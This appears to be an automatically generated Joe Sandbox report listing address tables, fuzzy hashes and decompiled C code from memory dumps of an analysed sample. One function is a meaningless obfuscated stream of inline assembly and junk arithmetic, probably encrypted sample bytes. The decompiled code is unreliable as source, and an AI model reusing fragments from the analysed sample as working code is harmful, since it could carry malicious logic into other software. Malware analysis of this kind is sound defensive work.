0x017e2a82
0x017e2a89
0x017e2a89
0x017e2a7a
0x017e2a7f
0x017e2a7f
0x017e2a7f
0x00000000
0x017e2a7f
0x017e2aa4
0x017e2aa4
0x017e2ab6
0x017e2abd
0x017e2ac0
0x017e2ac4
0x017e2ac6
0x017e2ac9
0x017e2acf
0x017e2ad1
0x017e2ad3
0x017e2ad3
0x017e2ad3
0x017e2acf
0x017e2ad6
0x017e2ad9
0x017e2adb
0x017e2add
0x017e2af9
0x017e2af9
0x017e2aff
0x017e2adf
0x017e2adf
0x017e2ae7
0x017e2aea
0x017e2aef
0x017e2af4
0x017e2af4
0x017e2b01
0x017e2b05
0x017e2b08
0x017e2b08
0x017e2b0d
0x017e2b11
0x017e2b1b
0x017e2b20
0x00000000
0x017e2b11
0x017e2a60
0x017e2a61
0x017e2a6b
0x00000000
0x017e2a6b
0x017e2a1f
0x017e2a25
0x017e2a25
0x017e2a27
0x017e2a38
0x017e2a3d
0x017e2a3d
0x017e2a3f
0x017e2a3f
0x00000000
0x017e2a3f
0x017e2a2c
0x017e2a2c
0x017e2a31
0x00000000
0x00000000
0x017e2a36
0x017e2a36
0x00000000
0x017e2a36
0x017e2a0c
0x00000000
0x017e2a0c
0x017e29a1
0x017e29a4
0x017e29a4
0x017e29b0
0x017e29b5
0x017e29b9
0x00000000
0x017e29bf
0x017e29c3
0x017e29c6
0x017e29c6
0x017e29cd
0x017e29d3
0x017e29d8
0x00000000
0x017e29d8
0x017e29b9
0x017e2980
0x017e2983
0x017e2990
0x00000000
0x017e2989
0x017e2989
0x017e298c
0x017e298c
0x017e2995
0x017e2995
0x017e2999
0x017e2999
0x00000000
0x017e2999

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64edf789523a91b7bd51a7faf0028769b0a8341cb08aca656961a23e1d7ba517
Instruction ID: c69c2fd80b79eb69681570e19c69413fbed8fd2254a2e63f5e833e379a93f6f1
Opcode Fuzzy Hash: 64edf789523a91b7bd51a7faf0028769b0a8341cb08aca656961a23e1d7ba517
Instruction Fuzzy Hash: C171D531A0050A9BDB25CF6DC888A7EFBFAEF4C350F148169D915E7286EB34DA41C790

Uniqueness

Uniqueness Score: -1.00%

Function 017AB8D0 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E017AB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1807b9c; // 0x0
				_t124 = L01734620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E01759800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									L017595B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E017595D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L017377F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E01759910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E017595D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1807b9c; // 0x0
									_t92 = L01734620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E01759910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = L0171A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = L017AE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = L017AE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						L017595B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x017ab8d9
0x017ab8e4
0x00000000
0x017ab8e6
0x017ab8f3
0x017ab8f5
0x017ab8f5
0x017ab8f8
0x017ab920
0x017ab924
0x017ab936
0x017ab939
0x017ab93d
0x017ab948
0x017ab9a0
0x017ab9a0
0x017ab9a4
0x017ab9bf
0x017ab9c4
0x017ab9c6
0x017ab9cd
0x017ab9d1
0x017abad4
0x017abad8
0x017abada
0x017abadc
0x017abadc
0x017abadf
0x017abae0
0x017abae2
0x017abae4
0x017abaec
0x017abaee
0x017abaf0
0x017abaf0
0x017abaec
0x017abafb
0x017abafc
0x017abafe
0x017abb01
0x017abb01
0x00000000
0x017abb06
0x017ab9d7
0x017ab9db
0x017ab9db
0x017ab9de
0x017ab9de
0x017ab9e4
0x017ab9e7
0x017ab9ea
0x017ab9ec
0x017ab9ef
0x017ab9f3
0x017aba1b
0x017aba1b
0x017aba23
0x017aba24
0x017aba27
0x017aba2a
0x017aba2b
0x017aba2e
0x017aba30
0x017aba37
0x017aba3f
0x017aba9c
0x017abaa2
0x017abb13
0x017abb15
0x017abaae
0x017abaae
0x017abab3
0x017abab5
0x017ababa
0x017abac8
0x017abac8
0x017ababa
0x017abacd
0x017abacf
0x00000000
0x017abacf
0x017abb1a
0x00000000
0x017abb1c
0x017abaa7
0x017abb11
0x00000000
0x017abb11
0x017abaa9
0x00000000
0x00000000
0x00000000
0x00000000
0x017aba41
0x017aba41
0x017aba41
0x017aba58
0x017aba5d
0x017aba62
0x00000000
0x00000000
0x017aba64
0x017aba67
0x017aba68
0x017aba69
0x017aba6c
0x017aba6f
0x017aba71
0x017aba78
0x017aba80
0x00000000
0x00000000
0x017aba90
0x017aba90
0x017aba97
0x00000000
0x017aba97
0x017ab9f5
0x017ab9f7
0x017ab9f7
0x017ab9fa
0x017aba03
0x017aba07
0x017aba0c
0x017aba10
0x017aba17
0x00000000
0x017ab9f7
0x017ab9a6
0x017ab9a8
0x017ab9af
0x017ab9b3
0x00000000
0x00000000
0x017ab9b9
0x00000000
0x017ab9b9
0x017ab94d
0x017ab98f
0x017ab995
0x017ab999
0x017ab960
0x017ab967
0x017ab968
0x017ab96a
0x00000000
0x017ab96a
0x017ab99b
0x017ab99e
0x00000000
0x00000000
0x00000000
0x017ab99e
0x017ab951
0x017ab954
0x017ab95a
0x017ab95e
0x017ab972
0x017ab979
0x017ab97d
0x017ab97f
0x017ab980
0x017ab982
0x017ab984
0x00000000
0x017ab984
0x00000000
0x017ab926
0x00000000
0x017ab926

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eff56ddbb7c56b97d14d46570c113ec39a21671b28c02ab40601d8f052ca20a
Instruction ID: f782936bda0129b223f5df83ec0141432b78d080e8eb1b2344de17bf3fd851bb
Opcode Fuzzy Hash: 1eff56ddbb7c56b97d14d46570c113ec39a21671b28c02ab40601d8f052ca20a
Instruction Fuzzy Hash: CB710132200B06EFE732CF28C858F56FBE5EB80724F544628E655876A1DB75EA40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 017D1002 Relevance: .2, Instructions: 198
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E017D1002(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t77;
				signed short _t78;
				signed short _t80;
				signed int _t81;
				signed short _t82;
				signed short _t83;
				signed short _t85;
				signed int _t86;
				void* _t90;
				signed short _t91;
				signed int _t95;
				signed short _t97;
				signed short _t99;
				intOrPtr* _t101;
				signed short _t102;
				signed int _t103;
				signed short _t105;
				intOrPtr _t106;
				signed int* _t108;
				signed short _t109;
				signed short _t111;
				signed short _t112;
				signed int _t113;
				signed short _t117;
				signed int _t120;
				void* _t121;
				signed int _t122;
				signed int _t126;
				signed int* _t127;
				signed short _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t132;
				signed int _t133;

				_t121 = __edx;
				_t130 = __ecx;
				_v16 = __ecx;
				_t108 = __ecx + 0xa4;
				_t75 =  *_t108;
				L4:
				L4:
				if(_t75 != _t108) {
					goto L1;
				} else {
					_t127 = _t130 + 0x9c;
					_t120 =  *_t127;
				}
				while(_t120 != _t127) {
					_t132 = _t120 & 0xffff0000;
					__eflags = _t132 - _t121;
					if(_t132 <= _t121) {
						_t75 =  *((intOrPtr*)(_t120 + 0x14)) + _t132;
						__eflags = _t75 - _t121;
						if(_t75 > _t121) {
							 *0x1805898 = 5;
						}
					}
					_t120 =  *_t120;
				}
				L68:
				return _t75;
				L1:
				_t3 = _t75 - 0x10; // -16
				_t126 = _t3;
				_v20 = _t126;
				__eflags =  *((intOrPtr*)(_t126 + 0x1c)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x1c)) > _t121) {
					L3:
					_t75 =  *_t75;
					goto L4;
				}
				__eflags =  *((intOrPtr*)(_t126 + 0x28)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x28)) > _t121) {
					_t8 = _t126 + 0x38; // 0x28
					_t101 = _t8;
					_t109 = 0;
					_v8 = _v8 & 0;
					_t76 =  *_t101;
					_v12 = _t101;
					__eflags = _t76 - _t101;
					if(_t76 == _t101) {
						L17:
						_t102 = 0;
						_v20 = 0;
						__eflags = _t109;
						if(_t109 == 0) {
							_t109 = _t126;
						}
						_t128 = 0;
						__eflags = _t109 - _t121;
						if(_t109 >= _t121) {
							L29:
							_t111 = _v8 + 0xfffffff8;
							__eflags = _t111 - _t121;
							if(_t111 <= _t121) {
								L33:
								 *0x18058b0 = _t128;
								 *0x18058b4 = _t102;
								__eflags = _t128;
								if(_t128 == 0) {
									L42:
									__eflags =  *(_t130 + 0x4c);
									if( *(_t130 + 0x4c) == 0) {
										_t77 =  *_t128 & 0x0000ffff;
										_t112 = 0;
										__eflags = 0;
									} else {
										_t85 =  *_t128;
										_t112 =  *(_t130 + 0x4c);
										__eflags = _t85 & _t112;
										if((_t85 & _t112) != 0) {
											_t85 = _t85 ^  *(_t130 + 0x50);
											__eflags = _t85;
										}
										_t77 = _t85 & 0x0000ffff;
									}
									_v8 = _t77;
									__eflags = _t102;
									if(_t102 != 0) {
										_t117 =  *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t117;
										 *0x18058b8 = _t117;
										_t112 =  *(_t130 + 0x4c);
									}
									__eflags = _t112;
									if(_t112 == 0) {
										_t78 =  *_t128 & 0x0000ffff;
									} else {
										_t83 =  *_t128;
										__eflags =  *(_t130 + 0x4c) & _t83;
										if(( *(_t130 + 0x4c) & _t83) != 0) {
											_t83 = _t83 ^  *(_t130 + 0x50);
											__eflags = _t83;
										}
										_t78 = _t83 & 0x0000ffff;
									}
									_t122 = _t78 & 0x0000ffff;
									 *0x18058bc = _t122;
									__eflags =  *(_t130 + 0x4c);
									_t113 = _v8 & 0x0000ffff;
									if( *(_t130 + 0x4c) == 0) {
										_t80 =  *(_t128 + _t113 * 8) & 0x0000ffff;
									} else {
										_t82 =  *(_t128 + _t113 * 8);
										__eflags =  *(_t130 + 0x4c) & _t82;
										if(( *(_t130 + 0x4c) & _t82) != 0) {
											_t82 = _t82 ^  *(_t130 + 0x50);
											__eflags = _t82;
										}
										_t122 =  *0x18058bc; // 0x0
										_t80 = _t82 & 0x0000ffff;
									}
									_t81 = _t80 & 0x0000ffff;
									__eflags =  *0x18058b8 - _t81; // 0x0
									if(__eflags == 0) {
										_t75 =  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t122 - ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75);
										if(_t122 == ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75)) {
											goto L68;
										}
										 *0x1805898 = 7;
										return _t75;
									} else {
										 *0x1805898 = 6;
										return _t81;
									}
								}
								__eflags = _t102;
								if(_t102 == 0) {
									goto L42;
								}
								__eflags =  *(_t130 + 0x4c);
								if( *(_t130 + 0x4c) == 0) {
									_t86 =  *_t128 & 0x0000ffff;
								} else {
									_t91 =  *_t128;
									__eflags =  *(_t130 + 0x4c) & _t91;
									if(( *(_t130 + 0x4c) & _t91) != 0) {
										_t91 = _t91 ^  *(_t130 + 0x50);
										__eflags = _t91;
									}
									_t86 = _t91 & 0x0000ffff;
								}
								_v8 = _t86;
								_t90 = _t128 + (_v8 & 0x0000ffff) * 8;
								__eflags = _t90 - _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3);
								if(_t90 == _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3)) {
									goto L42;
								} else {
									 *0x1805898 = 4;
									return _t90;
								}
							}
							_v20 =  *(_t130 + 0x54) & 0x0000ffff;
							while(1) {
								_t102 = _t111;
								_t95 = ( *(_t111 + 4) ^ _v20) & 0x0000ffff;
								__eflags = _t95;
								if(_t95 == 0) {
									goto L33;
								}
								_t111 = _t111 + _t95 * 0xfffffff8;
								__eflags = _t111 - _t121;
								if(_t111 > _t121) {
									continue;
								}
								goto L33;
							}
							goto L33;
						} else {
							_t103 =  *(_t130 + 0x4c);
							while(1) {
								_t128 = _t109;
								__eflags = _t103;
								if(_t103 == 0) {
									_t97 =  *_t109 & 0x0000ffff;
								} else {
									_t99 =  *_t109;
									_t103 =  *(_t130 + 0x4c);
									__eflags = _t99 & _t103;
									if((_t99 & _t103) != 0) {
										_t99 = _t99 ^  *(_t130 + 0x50);
										__eflags = _t99;
									}
									_t97 = _t99 & 0x0000ffff;
								}
								__eflags = _t97;
								if(_t97 == 0) {
									break;
								}
								_t109 = _t109 + (_t97 & 0x0000ffff) * 8;
								__eflags = _t109 - _t121;
								if(_t109 < _t121) {
									continue;
								}
								break;
							}
							_t102 = _v20;
							goto L29;
						}
					}
					_t133 = _v8;
					do {
						_t105 =  *((intOrPtr*)(_t76 + 0xc)) +  *((intOrPtr*)(_t76 + 8));
						_t129 = _v12;
						__eflags = _t105 - _t121;
						if(_t105 < _t121) {
							__eflags = _t105 - _t109;
							if(_t105 > _t109) {
								_t109 = _t105;
							}
						}
						_t106 =  *((intOrPtr*)(_t76 + 8));
						__eflags = _t106 - _t121;
						if(_t106 > _t121) {
							__eflags = _t133;
							if(_t133 == 0) {
								L14:
								_t18 = _t76 - 8; // -8
								_t133 = _t18;
								goto L15;
							}
							__eflags = _t106 -  *((intOrPtr*)(_t133 + 0x10));
							if(_t106 >=  *((intOrPtr*)(_t133 + 0x10))) {
								goto L15;
							}
							goto L14;
						}
						L15:
						_t76 =  *_t76;
						__eflags = _t76 - _t129;
					} while (_t76 != _t129);
					_t126 = _v20;
					_v8 = _t133;
					_t130 = _v16;
					goto L17;
				}
				goto L3;
			}

0x017d1002
0x017d100c
0x017d100f
0x017d1012
0x017d1018
0x00000000
0x017d102e
0x017d1030
0x00000000
0x017d1032
0x017d1032
0x017d1038
0x017d1038
0x017d121e
0x017d11ff
0x017d1205
0x017d1207
0x017d120c
0x017d120e
0x017d1210
0x017d1212
0x017d1212
0x017d1210
0x017d121c
0x017d121c
0x017d1228
0x017d1228
0x017d101c
0x017d101c
0x017d101c
0x017d101f
0x017d1022
0x017d1025
0x017d102c
0x017d102c
0x00000000
0x017d102c
0x017d1027
0x017d102a
0x017d103f
0x017d103f
0x017d1042
0x017d1044
0x017d1047
0x017d1049
0x017d104c
0x017d104e
0x017d1088
0x017d1088
0x017d108a
0x017d108d
0x017d108f
0x017d1091
0x017d1091
0x017d1093
0x017d1095
0x017d1097
0x017d10c8
0x017d10cb
0x017d10ce
0x017d10d0
0x017d10f4
0x017d10f4
0x017d10fa
0x017d1100
0x017d1102
0x017d1150
0x017d1150
0x017d1154
0x017d1167
0x017d116a
0x017d116a
0x017d1156
0x017d1156
0x017d1158
0x017d115b
0x017d115d
0x017d115f
0x017d115f
0x017d115f
0x017d1162
0x017d1162
0x017d116c
0x017d116f
0x017d1171
0x017d117b
0x017d117b
0x017d117d
0x017d1183
0x017d1183
0x017d1186
0x017d1188
0x017d1199
0x017d118a
0x017d118a
0x017d118c
0x017d118f
0x017d1191
0x017d1191
0x017d1191
0x017d1194
0x017d1194
0x017d119c
0x017d11a2
0x017d11a8
0x017d11ac
0x017d11af
0x017d11c7
0x017d11b1
0x017d11b1
0x017d11b4
0x017d11b7
0x017d11b9
0x017d11b9
0x017d11b9
0x017d11bc
0x017d11c2
0x017d11c2
0x017d11cb
0x017d11ce
0x017d11d4
0x017d11e7
0x017d11ed
0x017d11ef
0x00000000
0x00000000
0x017d11f1
0x00000000
0x017d11d6
0x017d11d6
0x00000000
0x017d11d6
0x017d11d4
0x017d1104
0x017d1106
0x00000000
0x00000000
0x017d1108
0x017d110c
0x017d111d
0x017d110e
0x017d110e
0x017d1110
0x017d1113
0x017d1115
0x017d1115
0x017d1115
0x017d1118
0x017d1118
0x017d1126
0x017d113a
0x017d113d
0x017d113f
0x00000000
0x017d1141
0x017d1141
0x00000000
0x017d1141
0x017d113f
0x017d10d6
0x017d10d9
0x017d10dd
0x017d10e3
0x017d10e6
0x017d10e9
0x00000000
0x00000000
0x017d10ee
0x017d10f0
0x017d10f2
0x00000000
0x00000000
0x00000000
0x017d10f2
0x00000000
0x017d1099
0x017d1099
0x017d109c
0x017d109c
0x017d109e
0x017d10a0
0x017d10b3
0x017d10a2
0x017d10a2
0x017d10a4
0x017d10a7
0x017d10a9
0x017d10ab
0x017d10ab
0x017d10ab
0x017d10ae
0x017d10ae
0x017d10b6
0x017d10b9
0x00000000
0x00000000
0x017d10be
0x017d10c1
0x017d10c3
0x00000000
0x00000000
0x00000000
0x017d10c3
0x017d10c5
0x00000000
0x017d10c5
0x017d1097
0x017d1050
0x017d1053
0x017d1056
0x017d1059
0x017d105c
0x017d105e
0x017d1060
0x017d1062
0x017d1064
0x017d1064
0x017d1062
0x017d1066
0x017d1069
0x017d106b
0x017d106d
0x017d106f
0x017d1076
0x017d1076
0x017d1076
0x00000000
0x017d1076
0x017d1071
0x017d1074
0x00000000
0x00000000
0x00000000
0x017d1074
0x017d1079
0x017d1079
0x017d107b
0x017d107b
0x017d107f
0x017d1082
0x017d1085
0x00000000
0x017d1085
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a29f7efacfdb8ead5b56bbc585f571a81fea1ce7cae60d3e0fbedc636a59499c
Instruction ID: 75226d4c2c85c4b41dc03829c94a6ad0382f021558038d6aa58071f07ae97a7f
Opcode Fuzzy Hash: a29f7efacfdb8ead5b56bbc585f571a81fea1ce7cae60d3e0fbedc636a59499c
Instruction Fuzzy Hash: 82717E74B0076ACBDB24CF69D49067AF7F1FB44301BA848AED99287640D776EA50CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A9E1F5 Relevance: .2, Instructions: 178
COMMONCrypto

Download Yara Rule

C-Code - Quality: 53%

			E00A9E1F5() {
				intOrPtr _t23;
				signed int _t25;
				signed char _t29;
				signed int _t37;

				asm("adc ah, 0x28");
				asm("cmpsw");
				asm("rol byte [0x3380a60a], 0x97");
				asm("cmpsb");
				 *0x910f3ad4 = _t23;
				 *0xd1548b0f = _t37 |  *0x8350e413;
				_t25 =  *0x910f3ad4 -  *0xee5be5f2;
				 *0xc39c6f0b = _t29 |  *0x256a1f80;
				asm("adc [0x1c67211], esi");
				asm("adc [0xefb44636], edx");
				asm("sbb ch, 0xb6");
				 *0x54895a09 =  *0x54895a09 << 0xf1;
				 *0xfe715da1 = _t37;
				 *0xa8ff8a09 =  *0xa8ff8a09 & _t25;
				 *0xad0b6db1 =  *0xad0b6db1 | _t25;
				asm("cmpsw");
				 *0xb7dd0ea8 =  *0xb7dd0ea8 << 0xbf;
				asm("ror dword [0x7c70863d], 0x31");
				if( *0x34966492 <= _t25) {
					asm("adc ebp, [0x8d157b77]");
					_push(__esi);
					__edi = __edi ^  *0xcd501ad8;
					 *0x18442bba =  *0x18442bba << 0x59;
					__esp = __esp +  *0x155c5acc;
					asm("sbb edi, [0x3fe05167]");
					asm("lodsb");
					__eax = 0x7900970f;
					asm("rcr byte [0x16d27ee4], 0x88");
					asm("rol byte [0x5c62adb6], 0x77");
					__ecx = __ecx & 0x4e12c111;
					 *0xc70f979b =  *0xc70f979b ^ __esi;
					 *0xa936ca1c = __ch;
					_push(__ecx);
					if(__cl <= 8) {
						asm("adc [0x5a66477], edi");
						asm("scasb");
						__al = __al |  *0xe1d68d0;
						 *0xb3a32f64 =  *0xb3a32f64 >> 0x2f;
						asm("ror dword [0x3fec2fa9], 0x3c");
						__bl = __bl + 4;
						__ebp = __ebp - 0x8fb5f53e;
						if(__ebp == 0) {
							 *0x6f89127b =  *0x6f89127b << 0xa5;
							__ecx =  *0xdd2623f8;
							_pop(__esi);
							asm("sbb edx, [0x6fb74862]");
							__ecx =  *0xdd2623f8 +  *0x8ef2ea39;
							 *0xd7317ff =  *0xd7317ff << 0xba;
							asm("adc [0xb2775bf6], dh");
							 *0x2aff924 =  *0x2aff924 >> 0x44;
							asm("sbb ah, 0xf9");
							 *0xf4982d2c =  *0xf4982d2c + __dl;
							__ebp = __ebp & 0x8559fc16;
							__edx =  *0x70deb7de;
							_t14 = __esp;
							__esp =  *0xd34ef283;
							 *0xd34ef283 = _t14;
							if( *0x4c40778a >= __cl) {
								asm("adc [0xe9bbb470], edi");
								 *0xabca968 =  *0xabca968 << 0x84;
								asm("stosd");
								if( *0xabca968 >= 0) {
									__ecx = __ecx -  *0xaae6ec78;
									 *0xd68c3020 =  *0xd68c3020 << 0xdc;
									 *0x77ba123a =  *0x77ba123a | __al;
									asm("adc dh, [0x2ea2b8c6]");
									_push(0xabd4969c);
									_push( *0x5f31eaf1);
									asm("adc bh, [0x731f18b0]");
									asm("rcl dword [0xfdc50d09], 0xb2");
									asm("ror byte [0xfa20af24], 0x56");
									 *0x660b0f8b =  *0x660b0f8b + __esi;
									__edi = __edi + 1;
									__ebp = __ebp -  *0x6747b103;
									if(__ebp < 0) {
										__esi =  *0xa744907d * 0xda8;
										asm("sbb [0x1a0b96b7], bl");
										asm("adc [0x2da0a41f], esp");
										asm("sbb esp, [0x89ba7f9f]");
										__eax = 0x7900970f &  *0x19ca1bf4;
										asm("rcl dword [0x27709137], 0x5b");
										 *0x7c027dfb =  *0x7c027dfb << 0x18;
										asm("adc ecx, 0x9e051d33");
										 *0x686865b9 =  *0x686865b9 | 0x7900970f;
										_push(__edi);
										_push(__esi);
										 *0xff15c826 =  *0xff15c826 >> 0x27;
										asm("cmpsb");
										_push(__esi);
										if(__esi == 0) {
											_pop(__edx);
											__ecx = __ecx & 0xedb5e6a1;
											 *0xe8ee29d8 =  *0xe8ee29d8 - __ecx;
											 *0xca77a518 =  *0xca77a518 >> 0xf8;
											L1();
											__edx = __edx +  *0x96dc3e8;
											_pop(__edx);
											 *0xb13e7b8a =  *0xb13e7b8a + __bh;
											__ecx = __ecx ^  *0xd9d875dd;
											asm("scasd");
											asm("adc ecx, [0x79144e9e]");
											_pop(__eax);
											 *0xfdfa36e0 =  *0xfdfa36e0 ^ __bh;
											 *0x9c1c9584 =  *0x9c1c9584 >> 0x13;
											asm("ror dword [0x4ba85435], 0x79");
											__esp = __esp |  *0x1bf39961;
											__eax = __eax - 0x79aa0cc7;
											 *0xb21913f1 = __ebx;
											asm("adc edi, 0x850cd18b");
											__ebp = __ebp - 1;
											 *0x6fb70bfd =  *0x6fb70bfd + 0x7900970f;
											 *0x41daa2a =  *0x41daa2a & __bl;
											__ecx =  *0xfdfb08f7;
											 *0xd5c5ed1 =  *0xd5c5ed1 >> 0xc1;
											 *0xa88d8be6 =  *0xa88d8be6 | __bh;
											if( *0xa88d8be6 == 0) {
												 *0xa406307a =  *0xa406307a & 0x7900970f;
												 *0x911b1de1 =  *0x911b1de1 ^ __cl;
												 *0x31d30cf4 =  *0x31d30cf4 ^ __edx;
												 *0x3bff513d =  *0x3bff513d + 0x7900970f;
												 *0x395625e5 =  *0x395625e5 >> 0xe7;
												_push(__ecx);
												asm("adc esi, [0x2e5d0bc4]");
												__ebp =  *0x2a5d8769 * 0xade1;
												 *0x13a89e2e =  *0x13a89e2e >> 0x8a;
												asm("sbb bh, [0xb2640080]");
												 *0x92fff0f0 =  *0x92fff0f0 - __ecx;
												_t21 = __edi;
												__edi =  *0x10e8e668;
												 *0x10e8e668 = _t21;
												asm("stosd");
												_push( *0x7a762ff3);
												_pop(__edx);
												__edx = __edx ^  *0xa0c11866;
												 *0x3bbc1e35 =  *0x3bbc1e35 << 0xbd;
												 *0xf8e0019 =  *0xf8e0019 << 0xd5;
												__dl = __dl -  *0x3af72714;
												__edx = __edx -  *0x6d8f8162;
											}
										}
									}
								}
							}
						}
					}
				}
				L1:
				 *0x1be1c709 =  *0x1be1c709 << 0xb3;
				asm("adc esi, [0x6a6f2b6e]");
				if( *0x1be1c709 > 0) {
					_t25 = _t25 &  *0x4e0d0f76;
				}
				goto L1;
			}

0x00a9e1f7
0x00a9e1fb
0x00a9e203
0x00a9e20a
0x00a9e211
0x00a9e22d
0x00a9e239
0x00a9e23f
0x00a9e245
0x00a9e24c
0x00a9e252
0x00a9e25b
0x00a9e268
0x00a9e26e
0x00a9e284
0x00a9e296
0x00a9e298
0x00a9e2a6
0x00a9e2ae
0x00a9e2b4
0x00a9e2c0
0x00a9e2c1
0x00a9e2cd
0x00a9e2d4
0x00a9e2da
0x00a9e2e6
0x00a9e2e7
0x00a9e2ed
0x00a9e2f4
0x00a9e2fb
0x00a9e301
0x00a9e307
0x00a9e310
0x00a9e31a
0x00a9e320
0x00a9e326
0x00a9e327
0x00a9e32d
0x00a9e334
0x00a9e33b
0x00a9e33e
0x00a9e344
0x00a9e34a
0x00a9e351
0x00a9e357
0x00a9e358
0x00a9e35e
0x00a9e364
0x00a9e36b
0x00a9e371
0x00a9e378
0x00a9e37b
0x00a9e381
0x00a9e387
0x00a9e38d
0x00a9e38d
0x00a9e38d
0x00a9e399
0x00a9e39f
0x00a9e3a5
0x00a9e3ac
0x00a9e3ad
0x00a9e3b3
0x00a9e3b9
